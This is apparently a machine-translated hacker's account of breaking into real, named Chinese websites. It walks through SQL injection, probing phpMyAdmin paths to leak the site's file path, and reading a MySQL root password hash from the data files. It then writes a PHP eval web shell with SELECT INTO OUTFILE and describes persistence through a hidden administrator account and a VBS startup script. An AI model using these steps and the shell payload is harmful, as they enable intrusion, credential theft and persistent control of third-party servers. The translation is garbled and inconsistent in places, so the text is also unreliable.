At first glance, it seems that all html static files are known as static files, which are not good at all. Click a few more columns to find this: http://www.bkjia.com /Celebrate/list. php? Id = 3-0-1, and the injection exists! If you do not need to do this manually, you will not be able to try to make a breakthrough. You can use pangolin to inject: the root permission can be used to directly write data to the shell. getshell has the following conditions: 1. Know the physical path of the site. 2. Have sufficient permissions. 3. magic_quotes_gpc () = OFF. Try to blow the absolute path: 1. /phpMyAdmin/index. php? Lang [] = 1 2. /phpMyAdmin/phpinfo. php 3. /load_file () 4. /phpmyadmin/themes/darkblue_orange/layout. inc. php 5. /phpmyadmin/libraries/select_lang.lib.php 6. /phpmyadmin/libraries/lect_lang.lib.php 7. /phpmyadmin/libraries/mcrypt. lib. php 8. /phpmyadmin/libraries/export/xls. php does not work ........................... yundun swept to this: http://www.dyyz.net.cn//phpinfo.php Obtain the website path: D:/www/phpinfo. php has the root permission and knows the website path. However, Condition 3 does not match and cannot be written to shell. However, phpmyadmin does not exist on the server by default. Try the universal password: account 'localhost' @ '@ "the password is blank. logon failure is sensitive: http://202.103.49.66/Admincp.php The social worker can't get in... Think about root, and read the root password into phpmyadmin or use shell. http://www.dyyz.net.cn//phpinfo.php Leaked D: \ phpStudy \ PHP5 \ php. ini: Modify the root password path: D: \ phpStudy \ MySQL \ Data \ mysql \ user. MYD read the root password: 17 ---- r (0072) 18 ---- o (006f) 19 ---- o (006f) 20 ---- t (0074) 21 ---- * (002a) 22 ---- 8 (0038) 23 ---- 2 (0032) 24 ---- E (0045) 25 ---- 1 (0031) 26 ---- C (0043) 27 ---- 5 (0035) 28 ---- 8 (0038) 29 ---- 2 (0032) 30 ---- 8 (0038) 31 ---- A (0041) 32 ---- 9 (0039) 33 ---- B (0042) 34 ---- 5 (0035) 35 ---- 4 (0034) 36 ---- 8 (0038) 37 ---- 6 (0036) 38 ---- 4 (0034)) 39 ---- 9 (0039) 40 ---- 1 (0031) 41 ---- 1 (0031) 42 ---- 5 (0035) 43 ---- 3 (0033) 44 ---- 5 (0035) 45 ---- 9 (0039) 46 ---- 8 (0038) 47 ---- F (0046) 48 ---- F (0046) 49 ---- 4 (0034) 50 ---- F (0046) 51 ---- 0 (0030) 52 ---- 3 (0033) 53 ---- 2 (0032) 54 ---- A (0041) 55 ---- 4 (0034) 56 ---- A (0041) 57 ---- B (0042) 58 ---- * (0044) 59 ---- * (0035) 60 ---- * (0041) 61 ---- * 0032) decrypt the data and log on to phpmyamin to find the mysql database, execute the SQL statement: elect '<? Php @ eval ($ _ POST [pass]);?> 'Into outfile' d:/wamp/www/daxia. php is successfully executed, shell is taken down, and the kitchen knife is connected: the server does not support asp, aspx, php's permission escalation fails ................... however, the server permissions are loose. Upload a remote control pony or a vbs program to start:
There is already a hidden account on the server. The alias "administrators" is commented. The administrator has unrestricted full access permissions to the computer/domain. The "Unzip adminAdministratorslipper $ sqluser" command is successfully completed. The server permission is loose. Upload a vbs file to add the user to the startup. Do not use bat. The batchcompute operation is displayed during startup. Restart the ddos server, otherwise, you can only wait for the server to restart ...............................